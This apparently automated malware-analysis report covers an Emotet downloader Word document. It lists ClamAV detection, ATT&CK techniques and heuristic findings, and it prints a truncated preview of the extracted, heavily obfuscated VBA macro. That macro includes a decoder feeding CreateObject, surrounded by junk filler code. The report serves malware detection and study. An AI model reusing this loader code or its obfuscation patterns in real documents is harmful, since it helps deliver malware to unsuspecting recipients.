MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7356227-0. Static analysis revealed an obfuscated auto-executing VBA macro, specifically an AutoOpen macro, which is a common characteristic of Emotet. The macro utilizes CreateObject and execution sinks, indicating it's designed to download and run a secondary payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment vector.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7356227-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7356227-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39325 bytes |
SHA-256: 66af2f2871a6e1158d814d901f60f63fe95f97b0057d0dcdc5d1c6abc33d549a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zzcetpzaqosg"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Gunpgilxuj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Weyqqjcnv, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Ejrmwvymo, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Klcoadunh, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Nzkcsahbgsxxm, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Zriojyykht, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Uuslsnouteamb, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Ogprwtrhtxvv, 7, 7, MSForms, CommandButton"
Attribute VB_Name = "Nmyygtwpmzgkg"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
''''''Szydlowski, Miskiewicz and Krzyzanowski Suite 448 Southwest Augustyn, Dziedzic and Partyka Apt. 988 East
''''''Podgórski Inc Apt. 647 West Soltysiak, Gawlik and Konieczny Apt. 821 North
Xyxlkmebsj = Fix("221.135.12.74")
Grygczzxmmken = Sin(Ifqumalm)
Ddlazbxsub = "Mozilla/5.0 (Windows NT 5.0; Win64; rv:14.7) Gecko/20100101 Firefox/14.7.1"
''''''Blaszczyk, Dominiak and Józwik Suite 323 East Koziol - Bielecki Apt. 909 East
Mzxqqyko = CDate(219)
''''''Rak LLC Suite 116 West Piórkowski - Noga Suite 519 Northeast
Yjvvcosxvfyvz = Hex(Xmlmltknfsq)
Jnblsffceezja = Log(536)
''''''Slusarczyk - Soltys Suite 833 Southwest Marczak, Twardowski and Kania Apt. 581 West
''''''Skiba LLC Apt. 279 West Jakubowski, Poplawski and Nawrocki Suite 634 Northeast
Kfraadslz = Int(Envqclqwo)
Mcuqktil = Sgn(669)
''''''Zuk Inc Apt. 363 Southeast Olejnik and Sons Apt. 098 West
Wedzbpxsqc = "Cheese"
Margnbnsej = Spgkszcnx
''''''Kubik and Sons Apt. 112 Southeast Biernacki Inc Suite 399 Northeast
Jsqbvtdxfb = Oct("Pizza")
Tzefhylgmfw = Int(Jmarzolprh)
Zrybltepymkot = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
''''''Wieckowski, Lesniewski and Stepien Suite 170 East Brzezinski - Drózdz Suite 073 Southeast
Mpvevjomgcg = Sin(13)
Set qiwhdjkasd = CreateObject(Hafkgnhwrqi(Hafkgnhwrqi(qiwhdjkasdA)))
''''''Paszkowski Inc Suite 038 Southeast Lapinski - Józwik Suite 732 Northwest
''''''Mackiewicz, Dudek and Kubiak Apt. 496 West Mika Inc Apt. 212 Southeast
Oniwmbfydf = Hex("Larkin - DickinsonApt. 686North")
Qhgfywbylev = CStr(Lztlgehanngxz)
Oridmyzi = "248.9.113.180"
''''''Gawron, Janiszewski and Rusin Suite 756 North Gawel - Kuc Apt. 428 West
Cnnwxjrgab = Atn(362)
''''''Nawrocki, Niedzielski and Wolny Suite 664 Northeast Stawicki, Sokolowski and Sadowski Apt. 808 Southwest
Mwbtndtziy = Atn(Kuvspylr)
Equepdoq = Rnd(719)
''''''Wysocki Group Apt. 768 North Skóra, Górka and Warchol Suite 326 South
''''''Radomski - Szyszka Apt. 562 North Skiba, Szymczak and Jaros Apt. 346 Northeast
Ycembtkwot = Round(Clmdnzrc)
Ljskzjoplr = CDbl(18)
''''''Wójcicki and Sons Suite 890 Northwest Wolinski, Górecki and Pawlik Apt. 451 Southeast
Dipjqwnp = "Ernser, Kemmer and HegmannApt. 485Northwest"
Cboirmppz = Oqvurtaiziie
''''''Jedrzejewski Group Suite 637 North Trzcinski, Lukasik and Serafin Suite 381 East
Eneivoahd = CLng("97.166.68.55")
Wrsbzvsbior = Hex(Zcnhdzuxoan)
Gejtgnpdvc = "Cheese"
''''''Jurkowski - Dudzik Suite 677 South Przybyla, Sliwinski and Kucharczyk Suite 331 West
Zmpcrtnup = Atn(752)
End Function
Function Iyqnxyvhiwcb()
On Error Resume Next
''''''Cichon LLC Suite 366 Northwest Cygan Inc Suite 054 West
''''''Chmura, Grzegorczyk and Zawadzki Apt. 562 West Partyka, Stachowiak and Paluch Suite 565 East
Uuqptrtoga = Tan("Chicken")
Kbaxdteyamfp = Sqr(Odrujafo)
Okyajvjfbhs = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.2.0 (KHTML, like Gecko) Chrome/23.0.885.0 Safari/536.2.0"
''''''Romanowski and Sons Apt. 964 North Mlynarczyk - Owczarek Apt. 715 Southwest
Gvymekhobct = Log(854)
''''''Galka Inc Apt. 265 Northeast Malek Group Suite 915 West
Wlrspwkjisv =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.